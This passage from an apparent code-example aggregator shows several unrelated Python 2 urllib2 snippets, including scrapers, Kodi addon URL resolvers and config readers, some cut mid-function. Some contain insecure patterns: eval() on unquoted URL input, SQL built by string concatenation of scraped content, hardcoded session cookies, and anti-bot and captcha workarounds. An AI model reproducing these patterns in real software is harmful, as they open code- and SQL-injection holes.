            _add_request_header(request, _headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif not limit == None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try: encoding = response.info().getheader('Content-Encoding')
            except: encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
            ua = _headers['User-Agent']
            _headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua, timeout)

            result = _basic_request(url, headers=_headers, post=post, timeout=timeout, limit=limit)

        if output == 'extended':
            try: response_headers = dict([(item[0].title(), item[1]) for item in response.info().items()])
            except: response_headers = response.headers
            response_code = str(response.code)
            try: cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: cookie = cf
            except: pass
            if close == True: response.close()
            return (result, response_code, response_headers, _headers, cookie)
        else:
            if close == True: response.close()
            return result
    except Exception as e:
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url), log_utils.LOGDEBUG)
        return
Ejemplo n.º 41
0
from decimal import Decimal
from pygaga.helpers.cachedns_urllib import custom_dns_opener
from pygaga.helpers.urlutils import download, parse_html
from pygaga.helpers.statsd import statsd_timing
from pygaga.simplejson import loads
from pygaga.helpers.utils import get_val, get_num_val

from guang_crawler import comments_pb2

logger = logging.getLogger('CrawlLogger')

FLAGS = gflags.FLAGS

DEFAULT_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
urllib2.install_opener(custom_dns_opener())

CURPAGE_RE = re.compile("^(.*currentPage=)([^&]*?)(&.*|)$")

JSON_RE = re.compile("^\s*jsonp_reviews_list\((.+)\)\s*$", re.M | re.S)
TM_JSON_RE = re.compile("^\s*TB.detailRate\s*=\s*(.+)$", re.M | re.S)
RATECOUNT_RE = re.compile("^.*<em>([0-9]+)</em>.*$", re.M | re.S)
DESCURL_RE = re.compile("http://dsc.taobaocdn.com/i\d[^\"']+\.desc[^\"']*",
                        re.M | re.S)
IMAGESTYLE_RE = re.compile("^.*url\(([^\)]+)\)$", re.M | re.S)


class TaobaoHtml:
    def __init__(self, item_id, num_id, is_tmall=False, max_comments=0):
        self.item_id = item_id
        self.num_id = num_id
 def __init__(self, username=None, password=None, filter=None, tmp_dir='/tmp'):
     ContentProvider.__init__(self, 'barrandov.tv', 'http://www.barrandov.tv', username, password, filter, tmp_dir)
     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
     urllib2.install_opener(opener)
Ejemplo n.º 43
0
def read_config(config_file):
    global config

    if not os.path.isfile(config_file):
        exit("[!] missing configuration file '%s'" % config_file)
    else:
        print "[i] using configuration file '%s'" % config_file

    config.clear()

    try:
        array = None
        content = open(config_file, "rb").read()

        for line in content.split("\n"):
            line = line.strip('\r')
            line = re.sub(r"\s*#.*", "", line)
            if not line.strip():
                continue

            if line.count(' ') == 0:
                if re.search(r"[^\w]", line):
                    if array == "USERS":
                        exit("[!] invalid USERS entry '%s'\n[?] (hint: add whitespace at start of line)" % line)
                    else:
                        exit("[!] invalid configuration (line: '%s')" % line)
                array = line.upper()
                config[array] = []
                continue

            if array and line.startswith(' '):
                config[array].append(line.strip())
                continue
            else:
                array = None
                try:
                    name, value = line.strip().split(' ', 1)
                except ValueError:
                    name = line
                    value = ""
                finally:
                    name = name.strip().upper()
                    value = value.strip("'\"").strip()

            _ = os.environ.get("%s_%s" % (NAME.upper(), name))
            if _:
                value = _

            if any(name.startswith(_) for _ in ("USE_", "SET_", "CHECK_", "ENABLE_", "SHOW_", "DISABLE_")):
                value = value.lower() in ("1", "true")
            elif value.isdigit():
                value = int(value)
            else:
                for match in re.finditer(r"\$([A-Z0-9_]+)", value):
                    if match.group(1) in globals():
                        value = value.replace(match.group(0), str(globals()[match.group(1)]))
                    else:
                        value = value.replace(match.group(0), os.environ.get(match.group(1), match.group(0)))
                if name.endswith("_DIR"):
                    value = os.path.realpath(os.path.join(ROOT_DIR, os.path.expanduser(value)))

            config[name] = value

    except (IOError, OSError):
        pass

    for option in ("MONITOR_INTERFACE", "CAPTURE_BUFFER", "LOG_DIR"):
        if not option in config:
            exit("[!] missing mandatory option '%s' in configuration file '%s'" % (option, config_file))

    for entry in (config.USERS or []):
        if len(entry.split(':')) != 4:
            exit("[!] invalid USERS entry '%s'" % entry)
        if re.search(r"\$\d+\$", entry):
            exit("[!] invalid USERS entry '%s'\n[?] (hint: please update PBKDF2 hashes to SHA256 in your configuration file)" % entry)

    if config.SSL_PEM:
        config.SSL_PEM = config.SSL_PEM.replace('/', os.sep)

    if config.USER_WHITELIST:
        if ',' in config.USER_WHITELIST:
            print("[x] configuration value 'USER_WHITELIST' has been changed. Please use it to set location of whitelist file")
        elif not os.path.isfile(config.USER_WHITELIST):
            exit("[!] missing 'USER_WHITELIST' file '%s'" % config.USER_WHITELIST)
        else:
            read_whitelist()

    config.PROCESS_COUNT = int(config.PROCESS_COUNT or CPU_CORES)

    if config.USE_MULTIPROCESSING:
        print("[x] configuration switch 'USE_MULTIPROCESSING' is deprecated. Please use 'PROCESS_COUNT' instead")

    if config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER)):
        print("[x] configuration switch 'DISABLE_LOCAL_LOG_STORAGE' turned on and neither option 'LOG_SERVER' nor 'SYSLOG_SERVER' are set. Falling back to console output of event data")

    if config.UDP_ADDRESS is not None and config.UDP_PORT is None:
        exit("[!] usage of configuration value 'UDP_ADDRESS' requires also usage of 'UDP_PORT'")

    if config.UDP_ADDRESS is None and config.UDP_PORT is not None:
        exit("[!] usage of configuration value 'UDP_PORT' requires also usage of 'UDP_ADDRESS'")

    if not str(config.HTTP_PORT or "").isdigit():
        exit("[!] invalid configuration value for 'HTTP_PORT' ('%s')" % config.HTTP_PORT)

    if config.PROCESS_COUNT and subprocess.mswindows:
        print "[x] multiprocessing is currently not supported on Windows OS"
        config.PROCESS_COUNT = 1

    if config.CAPTURE_BUFFER:
        if str(config.CAPTURE_BUFFER or "").isdigit():
            config.CAPTURE_BUFFER = int(config.CAPTURE_BUFFER)
        elif re.search(r"\d+\s*[kKmMgG]B", config.CAPTURE_BUFFER):
            match = re.search(r"(\d+)\s*([kKmMgG])B", config.CAPTURE_BUFFER)
            config.CAPTURE_BUFFER = int(match.group(1)) * {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}[match.group(2).upper()]
        elif re.search(r"\d+%", config.CAPTURE_BUFFER):
            physmem = _get_total_physmem()

            if physmem:
                config.CAPTURE_BUFFER = physmem * int(re.search(r"(\d+)%", config.CAPTURE_BUFFER).group(1)) / 100
            else:
                exit("[!] unable to determine total physical memory. Please use absolute value for 'CAPTURE_BUFFER'")
        else:
            exit("[!] invalid configuration value for 'CAPTURE_BUFFER' ('%s')" % config.CAPTURE_BUFFER)

        config.CAPTURE_BUFFER = config.CAPTURE_BUFFER / BLOCK_LENGTH * BLOCK_LENGTH

    if config.PROXY_ADDRESS:
        PROXIES.update({"http": config.PROXY_ADDRESS, "https": config.PROXY_ADDRESS})
        opener = urllib2.build_opener(urllib2.ProxyHandler(PROXIES))
        urllib2.install_opener(opener)
Ejemplo n.º 44
0
def read_body_and_headers(url,post=None,headers=[],follow_redirects=False,timeout=None):
    _log("read_body_and_headers "+url)
    if post is not None: _log("read_body_and_headers post="+post)
    if len(headers)==0: headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0"])
    # Start cookie lib
    ficherocookies=os.path.join(get_data_path(),'cookies.dat'); _log("read_body_and_headers cookies_file="+ficherocookies); cj=None; ClientCookie=None; cookielib=None
    try: _log("read_body_and_headers importing cookielib"); import cookielib # Let's see if cookielib is available
    except ImportError:
        _log("read_body_and_headers cookielib no disponible") # If importing cookielib fails # let's try ClientCookie
        try: _log("read_body_and_headers importing ClientCookie"); import ClientCookie
        except ImportError: _log("read_body_and_headers ClientCookie not available"); urlopen=urllib2.urlopen; Request=urllib2.Request # ClientCookie isn't available either
        else: _log("read_body_and_headers ClientCookie available"); urlopen=ClientCookie.urlopen; Request=ClientCookie.Request; cj=ClientCookie.MozillaCookieJar() # imported ClientCookie
    else:
        _log("read_body_and_headers cookielib available"); urlopen=urllib2.urlopen; Request=urllib2.Request; cj=cookielib.MozillaCookieJar() # importing cookielib worked
        # This is a subclass of FileCookieJar # that has useful load and save methods
    if cj is not None: # we successfully imported # one of the two cookie handling modules
        _log("read_body_and_headers Cookies enabled")
        if os.path.isfile(ficherocookies):
            _log("read_body_and_headers Reading cookie file")
            try: cj.load(ficherocookies) # if we have a cookie file already saved # then load the cookies into the Cookie Jar
            except: _log("read_body_and_headers Wrong cookie file, deleting..."); os.remove(ficherocookies)
        # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs
        if cookielib is not None:
            _log("read_body_and_headers opener using urllib2 (cookielib)")
            # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2
            if not follow_redirects: opener=urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),urllib2.HTTPCookieProcessor(cj),NoRedirectHandler())
            else: opener=urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            _log("read_body_and_headers opener using ClientCookie")
            # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie
            opener=ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)); ClientCookie.install_opener(opener)
    # -------------------------------------------------
    # Cookies instaladas, lanza la petición
    # -------------------------------------------------
    inicio=time.clock() # Contador
    txheaders={} # Diccionario para las cabeceras
    if post is None: _log("read_body_and_headers GET request") # Construye el request
    else: _log("read_body_and_headers POST request")
    _log("read_body_and_headers ---------------------------") # Añade las cabeceras
    for header in headers: _log("read_body_and_headers header %s=%s" % (str(header[0]),str(header[1]))); txheaders[header[0]]=header[1]
    _log("read_body_and_headers ---------------------------"); req=Request(url,post,txheaders)
    if timeout is None: handle=urlopen(req)
    else:        
        #Disponible en python 2.6 en adelante --> handle = urlopen(req, timeout=timeout) #Para todas las versiones:
        try: import socket; deftimeout=socket.getdefaulttimeout(); socket.setdefaulttimeout(timeout); handle=urlopen(req); socket.setdefaulttimeout(deftimeout)
        except:
            import sys
            for line in sys.exc_info(): _log( "%s" % line )
    cj.save(ficherocookies) # Actualiza el almacén de cookies
    # Lee los datos y cierra
    if handle.info().get('Content-Encoding')=='gzip': buf=StringIO(handle.read()); f=gzip.GzipFile(fileobj=buf); data=f.read()
    else: data=handle.read()
    info=handle.info(); _log("read_body_and_headers Response"); returnheaders=[]; _log("read_body_and_headers ---------------------------")
    for header in info: _log("read_body_and_headers "+header+"="+info[header]); returnheaders.append([header,info[header]])
    handle.close(); _log("read_body_and_headers ---------------------------")
    '''
    # Lanza la petición
    try: response = urllib2.urlopen(req)
    # Si falla la repite sustituyendo caracteres especiales
    except:
        req = urllib2.Request(url.replace(" ","%20"))
        # Añade las cabeceras
        for header in headers: req.add_header(header[0],header[1])
        response = urllib2.urlopen(req)
    '''
    # Tiempo transcurrido
    fin=time.clock(); _log("read_body_and_headers Downloaded in %d seconds " % (fin-inicio+1)); _log("read_body_and_headers body="+data); return data,returnheaders
Ejemplo n.º 45
0
def query(action=None, command=None, args=None, method='GET', data=None):
    '''
    Make a web call to a Parallels provider
    '''
    path = config.get_cloud_config_value('url',
                                         get_configured_provider(),
                                         __opts__,
                                         search_global=False)
    auth_handler = urllib2.HTTPBasicAuthHandler()
    auth_handler.add_password(
        realm='Parallels Instance Manager',
        uri=path,
        user=config.get_cloud_config_value('user',
                                           get_configured_provider(),
                                           __opts__,
                                           search_global=False),
        passwd=config.get_cloud_config_value('password',
                                             get_configured_provider(),
                                             __opts__,
                                             search_global=False))
    opener = urllib2.build_opener(auth_handler)
    urllib2.install_opener(opener)

    if action:
        path += action

    if command:
        path += '/{0}'.format(command)

    if not type(args, dict):
        args = {}

    kwargs = {'data': data}
    if isinstance(data, str) and '<?xml' in data:
        kwargs['headers'] = {
            'Content-type': 'application/xml',
        }

    if args:
        params = urllib.urlencode(args)
        req = urllib2.Request(url='{0}?{1}'.format(path, params), **kwargs)
    else:
        req = urllib2.Request(url=path, **kwargs)

    req.get_method = lambda: method

    log.debug('{0} {1}'.format(method, req.get_full_url()))
    if data:
        log.debug(data)

    try:
        result = urllib2.urlopen(req)
        log.debug('PARALLELS Response Status Code: {0}'.format(
            result.getcode()))

        if 'content-length' in result.headers:
            content = result.read()
            result.close()
            items = ET.fromstring(content)
            return items

        return {}
    except urllib2.URLError as exc:
        log.error('PARALLELS Response Status Code: {0} {1}'.format(
            exc.code, exc.msg))
        root = ET.fromstring(exc.read())
        log.error(root)
        return {'error': root}
Ejemplo n.º 46
0
def getRegexParsed(regexs,
                   url,
                   cookieJar=None,
                   forCookieJarOnly=False,
                   recursiveCall=False,
                   cachedPages={},
                   rawPost=False):  #0,1,2 = URL, regexOnly, CookieJarOnly
    if not recursiveCall:
        regexs = eval(urllib.unquote(regexs))
    #cachedPages = {}
    print 'url', url
    doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
    print 'doRegexs', doRegexs, regexs

    for k in doRegexs:
        if k in regexs:
            print 'processing ', k
            m = regexs[k]
            print m
            cookieJarParam = False
            if 'cookiejar' in m:  # so either create or reuse existing jar
                #print 'cookiejar exists',m['cookiejar']
                cookieJarParam = m['cookiejar']
                if '$doregex' in cookieJarParam:
                    cookieJar = getRegexParsed(regexs, m['cookiejar'],
                                               cookieJar, True, True,
                                               cachedPages)
                    cookieJarParam = True
                else:
                    cookieJarParam = True
            if cookieJarParam:
                if cookieJar == None:
                    print 'create cookie jar'
                    import cookielib
                    cookieJar = cookielib.LWPCookieJar()
                    #print 'cookieJar new',cookieJar

            if '$doregex' in m['page']:
                m['page'] = getRegexParsed(regexs,
                                           m['page'],
                                           cookieJar,
                                           recursiveCall=True,
                                           cachedPages=cachedPages)

            if 'post' in m and '$doregex' in m['post']:
                m['post'] = getRegexParsed(regexs,
                                           m['post'],
                                           cookieJar,
                                           recursiveCall=True,
                                           cachedPages=cachedPages)
                print 'post is now', m['post']

            if 'rawpost' in m and '$doregex' in m['rawpost']:
                m['rawpost'] = getRegexParsed(regexs,
                                              m['rawpost'],
                                              cookieJar,
                                              recursiveCall=True,
                                              cachedPages=cachedPages,
                                              rawPost=True)
                print 'rawpost is now', m['rawpost']

            if m['page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False:
                link = cachedPages[m['page']]
            else:
                #print 'Ingoring Cache',m['page']
                req = urllib2.Request(m['page'])
                print 'req', m['page']
                req.add_header(
                    'User-Agent',
                    'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'
                )
                if 'refer' in m:
                    req.add_header('Referer', m['refer'])
                if 'agent' in m:
                    req.add_header('User-agent', m['agent'])
                if 'setcookie' in m:
                    print 'adding cookie', m['setcookie']
                    req.add_header('Cookie', m['setcookie'])

                if not cookieJar == None:
                    #print 'cookieJarVal',cookieJar
                    cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
                    opener = urllib2.build_opener(
                        cookie_handler, urllib2.HTTPBasicAuthHandler(),
                        urllib2.HTTPHandler())
                    opener = urllib2.install_opener(opener)
                #print 'after cookie jar'
                post = None

                if 'post' in m:
                    postData = m['post']
                    if '$LiveStreamRecaptcha' in postData:
                        (captcha_challenge,
                         catpcha_word) = processRecaptcha(m['page'])
                        if captcha_challenge:
                            postData += 'recaptcha_challenge_field:' + captcha_challenge + ',recaptcha_response_field:' + catpcha_word
                    splitpost = postData.split(',')
                    post = {}
                    for p in splitpost:
                        n = p.split(':')[0]
                        v = p.split(':')[1]
                        post[n] = v
                    post = urllib.urlencode(post)

                if 'rawpost' in m:
                    post = m['rawpost']
                    if '$LiveStreamRecaptcha' in post:
                        (captcha_challenge,
                         catpcha_word) = processRecaptcha(m['page'])
                        if captcha_challenge:
                            post += '&recaptcha_challenge_field=' + captcha_challenge + '&recaptcha_response_field=' + catpcha_word

                if post:
                    response = urllib2.urlopen(req, post)
                else:
                    response = urllib2.urlopen(req)

                link = response.read()
                link = javascriptUnEscape(link)

                response.close()
                cachedPages[m['page']] = link
                #print link
                print 'store link for', m['page'], forCookieJarOnly

                if forCookieJarOnly:
                    return cookieJar  # do nothing
                if '$doregex' in m['expre']:
                    m['expre'] = getRegexParsed(regexs,
                                                m['expre'],
                                                cookieJar,
                                                recursiveCall=True,
                                                cachedPages=cachedPages)

            print 'exp k and url'
            print m['expre'], k, url
            print 'aa'
            if not m['expre'] == '':
                print 'doing it ', m['expre']
                if not '$LiveStreamCaptcha' in m['expre']:
                    reg = re.compile(m['expre']).search(link)
                    val = reg.group(1).strip()
                    if rawPost:
                        print 'rawpost'
                        val = urllib.quote_plus(val)
                    if 'htmlunescape' in m:
                        #val=urllib.unquote_plus(val)
                        import HTMLParser
                        val = HTMLParser.HTMLParser().unescape(val)

                    url = url.replace("$doregex[" + k + "]", val)
                else:
                    val = askCaptcha(m, link, cookieJar)
                    print 'url and val', url, val
                    url = url.replace("$doregex[" + k + "]", val)
                    #return val
            else:
                url = url.replace("$doregex[" + k + "]", '')
    if '$epoctime$' in url:
        url = url.replace('$epoctime$', getEpocTime())
    if recursiveCall: return url
    print 'final url', url
    item = xbmcgui.ListItem(path=url)
    #setResolvedUrl
    #xbmc.playlist(xbmc.playlist_video).clear()
    #xbmc.playlist(xbmc.playlist_video).add(url)
    #xbmc.Player().play(item=url)
    xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
Ejemplo n.º 47
0
def fetchMiaopaiData():
    lastid = None
    dr = re.compile(r'<[^>]+>', re.S)
    uname = '/app/yxtk/script/useragent.txt'
    f1 = open("/app/yxtk/script/data/1905movienews.sql", 'w', buffering=-1)
    with open(uname) as f:
        useragents = f.readlines()
    userAgent = random.choice(useragents)
    headers = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Cache-Control':
        'max-age=0',
        'Accept-Encoding':
        'gzip, deflate, sdch',
        'Accept-Language':
        'zh-CN,zh;q=0.8',
        'Cache-Control':
        'max-age=0',
        'Connection':
        'keep-alive',
        'Cookie':
        '__uv_=6606525396; SpMLdaPxuv=m4127234796; CNZZDATA1253604207=1123659875-1462410988-null%7C1462410988; C_P_i=1; GED_PLAYLIST_ACTIVITY=W3sidSI6IkxxMnIiLCJ0IjoxNDYyNDE1MjExLCJlZCI6eyJqIjp7IkEiOnsidHQiOjkzLCJwZCI6OTMsImJzIjoxMCwiZXMiOjB9fSwiZiI6MTQ2MjQxNTIxMSwiYSI6W3sia3YiOnsiYyI6MSwibSI6NzEwfX0seyJrdiI6eyJjIjo2LCJzIjoyNCwibSI6NTE5fX0seyJrdiI6eyJtIjoxMzk2LCJzIjoxNCwiYyI6M319LHsia3YiOnsibSI6MjU0OCwiYyI6MX19LHsia3YiOnsicyI6MiwibSI6MjY3fX0seyJrdiI6eyJjIjo0LCJtIjozODY4LCJzIjo2fX1dfSwibnYiOjEsInBsIjo5MywibHQiOjE0NjI0MTUyMTF9XQ..; WOlTvIlgRpuvid_=1138; pvid=1462419488231; bfd_s=68774865.12702418.1462415058975; tmc=2.68774865.79541045.1462419484753.1462419484753.1462419488287; tma=68774865.23748224.1462415058979.1462415058979.1462415058979.1; tmd=15.68774865.23748224.1462415058979.; Hm_lvt_49411f7bde52035653f2e2b70a0bb6a5=1462415059; Hm_lpvt_49411f7bde52035653f2e2b70a0bb6a5=1462419488; Hm_lvt_5a9573957327e40b58294447cd1d8ad2=1462415059; Hm_lpvt_5a9573957327e40b58294447cd1d8ad2=1462419488; bfd_g=9de2782bcb754fd700004f6702618c9d556e9317; Hm_lvt_bfe9961e25bf081711e59b3f78be82d4=1462415059; Hm_lpvt_bfe9961e25bf081711e59b3f78be82d4=1462419488; WOlTvIlgRptime_=1462419488231',
        'Host':
        'www.1905.com',
        'Upgrade-Insecure-Requests':
        '1',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
    }
    while True:
        for j in range(1, 3):
            time.sleep(1)
            pageNo = 0
            if j == 1:
                url = 'http://www.1905.com/list-p-catid-220.html'
            if j == 2:
                url = 'http://www.1905.com/film/#fixedLeftMod'
            print url
            try:
                encoding_support = ContentEncodingProcessor
                opener = urllib2.build_opener(encoding_support)
                opener.addheaders = [('User-agent', userAgent[:-2]),
                                     ('Accept-Encoding', "gzip, deflate")]
                urllib2.install_opener(opener)
                req = urllib2.urlopen(url.strip(), timeout=5)
                html = req.read()
                req.close()
                if html.find("<!DOCTYPE") == -1:
                    html = "<!DOCTYPE html><base href=http://learning.sohu.com><script type='text/javascript'>var pvinsight_page_ancestors = '200312880;401049313';</script><html><head><meta http-equiv='content-type' content='text/html; charset=utf-8' /></head><body>" + html + "</body></html>"
                try:
                    html = html.replace(
                        '<meta charset="utf-8">',
                        '<meta http-equiv="content-type" content="text/html; charset=utf-8" /'
                    )
                except Exception as e:
                    print e
                doc = pq(html)
                lis = doc('li.pic-pack-out')
                for li in lis.items():
                    movie_url = li('a.pic-url').attr('href')
                    m = re.findall(r'(\w*[0-9]+)\w*', str(movie_url))
                    if len(m) == 3:
                        movie_id = str(m[2])
                    else:
                        movie_id = '0000'
                    if li('a.pic-url').children('img').attr('src') is None:
                        movie_pic = " "
                        movie_id = '0000'
                    else:
                        movie_pic = li('a.pic-url').children('img').attr('src')
                    movie_title = "\" " + li('a.title').html().encode(
                        'utf8') + " \""
                    movie_title = movie_title.replace("\n", '')
                    movie_title = movie_title.replace(",", ',')
                    movie_date = li('span.timer').html()
                    imageUrl = qiniuUpdate(movie_pic.strip())

                    req = urllib2.Request(movie_url)
                    res = urllib2.urlopen(req)
                    html1 = unicode(res.read(), 'utf-8')
                    html1 = re.sub(r'<script>(.*?)</script>', '', html1)
                    res.close()
                    doc1 = pq(html1)
                    con = doc1('div.pic-content')
                    con('img').removeAttr("style")
                    con('img').removeAttr("width")
                    con('img').removeAttr("height")
                    con('img').attr("style", "width:100%")
                    p = con('div.pic-content').html()
                    if p is None or p == '':
                        continue
                    p = re.sub(r'&#13;', '', p)
                    p = re.sub(r'<style.*>([\S\s\t]*?)</style>', '', p)
                    p = re.sub(r'<script.*>([\S\s\t]*?)</script>', '', p)
                    p = re.sub(r'<p[^>]*>', '<p>', p)
                    p = re.sub(r'<(?!img|br|p|/p).*?>', '', p)
                    p = re.sub(r'\r', '', p)
                    p = re.sub(r'\n', '', p)
                    p = re.sub(r'\s', '', p)
                    p = re.sub(r'src=', ' src=', p)

                    #newqiniu = pq(p)
                    #imgs = newqiniu('img')
                    #for image in imgs.items():
                    #imgurl = image('img').attr('src')
                    #newimgurl = qiniuUpdate(imgurl.strip())
                    #p = p.replace(str(imgurl),str(newimgurl))
                    sql = "INSERT INTO 3rd_tencent_news(id,creator,modifier,create_time,modify_time,is_deleted,title,time,img_url,thumbnail_url,source,content,push_flag,recommend_flag,view_status) VALUES(NULL,'sys','sys',now(),now(),'n'," + movie_title.strip(
                    ) + ",now(),'" + imageUrl + "','" + imageUrl + "','1905电影网','" + p.strip(
                    ) + "',0,NULL,0);" + '\n'
                    print sql
                    f1.writelines(sql)
                    file_name = urllib2.unquote(
                        movie_pic.strip()).decode('utf8').split('/')[-1]
                    os.remove('/app/yxtk/script/' + file_name)
            except Exception as e:
                print e
        break
    f1.close()
Ejemplo n.º 48
0
def getRegexParsed(
        regexs,
        url,
        cookieJar=None,
        forCookieJarOnly=False,
        recursiveCall=False,
        cachedPages={},
        rawPost=False,
        cookie_jar_file=None):  #0,1,2 = URL, regexOnly, CookieJarOnly
    #cachedPages = {}
    #print 'url',url
    doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
    #        print 'doRegexs',doRegexs,regexs
    setresolved = True
    for k in doRegexs:
        if k in regexs:
            #print 'processing ' ,k
            m = regexs[k]
            #print m
            cookieJarParam = False
            if 'cookiejar' in m:  # so either create or reuse existing jar
                #print 'cookiejar exists',m['cookiejar']
                cookieJarParam = m['cookiejar']
                if '$doregex' in cookieJarParam:
                    cookieJar = getRegexParsed(regexs, m['cookiejar'],
                                               cookieJar, True, True,
                                               cachedPages)
                    cookieJarParam = True
                else:
                    cookieJarParam = True
            #print 'm[cookiejar]',m['cookiejar'],cookieJar
            if cookieJarParam:
                if cookieJar == None:
                    #print 'create cookie jar'
                    cookie_jar_file = None
                    if 'open[' in m['cookiejar']:
                        cookie_jar_file = m['cookiejar'].split(
                            'open[')[1].split(']')[0]
#                            print 'cookieJar from file name',cookie_jar_file

                    cookieJar = getCookieJar(cookie_jar_file)
                    #                        print 'cookieJar from file',cookieJar
                    if cookie_jar_file:
                        saveCookieJar(cookieJar, cookie_jar_file)
                    #import cookielib
                    #cookieJar = cookielib.LWPCookieJar()
                    #print 'cookieJar new',cookieJar
                elif 'save[' in m['cookiejar']:
                    cookie_jar_file = m['cookiejar'].split('save[')[1].split(
                        ']')[0]
                    complete_path = os.path.join(profile, cookie_jar_file)
                    #                        print 'complete_path',complete_path
                    saveCookieJar(cookieJar, cookie_jar_file)

            if m['page'] and '$doregex' in m['page']:
                pg = getRegexParsed(regexs,
                                    m['page'],
                                    cookieJar,
                                    recursiveCall=True,
                                    cachedPages=cachedPages)
                if len(pg) == 0:
                    pg = 'http://regexfailed'
                m['page'] = pg

            if 'setcookie' in m and m['setcookie'] and '$doregex' in m[
                    'setcookie']:
                m['setcookie'] = getRegexParsed(regexs,
                                                m['setcookie'],
                                                cookieJar,
                                                recursiveCall=True,
                                                cachedPages=cachedPages)
            if 'appendcookie' in m and m['appendcookie'] and '$doregex' in m[
                    'appendcookie']:
                m['appendcookie'] = getRegexParsed(regexs,
                                                   m['appendcookie'],
                                                   cookieJar,
                                                   recursiveCall=True,
                                                   cachedPages=cachedPages)

            if 'post' in m and '$doregex' in m['post']:
                m['post'] = getRegexParsed(regexs,
                                           m['post'],
                                           cookieJar,
                                           recursiveCall=True,
                                           cachedPages=cachedPages)
#                    print 'post is now',m['post']

            if 'rawpost' in m and '$doregex' in m['rawpost']:
                m['rawpost'] = getRegexParsed(regexs,
                                              m['rawpost'],
                                              cookieJar,
                                              recursiveCall=True,
                                              cachedPages=cachedPages,
                                              rawPost=True)
                #print 'rawpost is now',m['rawpost']

            if 'rawpost' in m and '$epoctime$' in m['rawpost']:
                m['rawpost'] = m['rawpost'].replace('$epoctime$',
                                                    getEpocTime())

            if 'rawpost' in m and '$epoctime2$' in m['rawpost']:
                m['rawpost'] = m['rawpost'].replace('$epoctime2$',
                                                    getEpocTime2())

            link = ''
            if m['page'] and m[
                    'page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False:
                #print 'using cache page',m['page']
                link = cachedPages[m['page']]
            else:
                if m['page'] and not m['page'] == '' and m['page'].startswith(
                        'http'):
                    if '$epoctime$' in m['page']:
                        m['page'] = m['page'].replace('$epoctime$',
                                                      getEpocTime())
                    if '$epoctime2$' in m['page']:
                        m['page'] = m['page'].replace('$epoctime2$',
                                                      getEpocTime2())

                    #print 'Ingoring Cache',m['page']
                    page_split = m['page'].split('|')
                    pageUrl = page_split[0]
                    header_in_page = None
                    if len(page_split) > 1:
                        header_in_page = page_split[1]

#                            if
#                            proxy = urllib2.ProxyHandler({ ('https' ? proxytouse[:5]=="https":"http") : proxytouse})
#                            opener = urllib2.build_opener(proxy)
#                            urllib2.install_opener(opener)

#                        import urllib2
#                        print 'urllib2.getproxies',urllib2.getproxies()
                    current_proxies = urllib2.ProxyHandler(
                        urllib2.getproxies())

                    #print 'getting pageUrl',pageUrl
                    req = urllib2.Request(pageUrl)
                    if 'proxy' in m:
                        proxytouse = m['proxy']
                        #                            print 'proxytouse',proxytouse
                        #                            urllib2.getproxies= lambda: {}
                        if pageUrl[:5] == "https":
                            proxy = urllib2.ProxyHandler({'https': proxytouse})
                            #req.set_proxy(proxytouse, 'https')
                        else:
                            proxy = urllib2.ProxyHandler({'http': proxytouse})
                            #req.set_proxy(proxytouse, 'http')
                        opener = urllib2.build_opener(proxy)
                        urllib2.install_opener(opener)

                    req.add_header(
                        'User-Agent',
                        'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'
                    )
                    proxytouse = None

                    if 'referer' in m:
                        req.add_header('Referer', m['referer'])
                    if 'accept' in m:
                        req.add_header('Accept', m['accept'])
                    if 'agent' in m:
                        req.add_header('User-agent', m['agent'])
                    if 'x-req' in m:
                        req.add_header('X-Requested-With', m['x-req'])
                    if 'x-addr' in m:
                        req.add_header('x-addr', m['x-addr'])
                    if 'x-forward' in m:
                        req.add_header('X-Forwarded-For', m['x-forward'])
                    if 'setcookie' in m:
                        #                            print 'adding cookie',m['setcookie']
                        req.add_header('Cookie', m['setcookie'])
                    if 'appendcookie' in m:
                        #                            print 'appending cookie to cookiejar',m['appendcookie']
                        cookiestoApend = m['appendcookie']
                        cookiestoApend = cookiestoApend.split(';')
                        for h in cookiestoApend:
                            n, v = h.split('=')
                            w, n = n.split(':')
                            ck = cookielib.Cookie(version=0,
                                                  name=n,
                                                  value=v,
                                                  port=None,
                                                  port_specified=False,
                                                  domain=w,
                                                  domain_specified=False,
                                                  domain_initial_dot=False,
                                                  path='/',
                                                  path_specified=True,
                                                  secure=False,
                                                  expires=None,
                                                  discard=True,
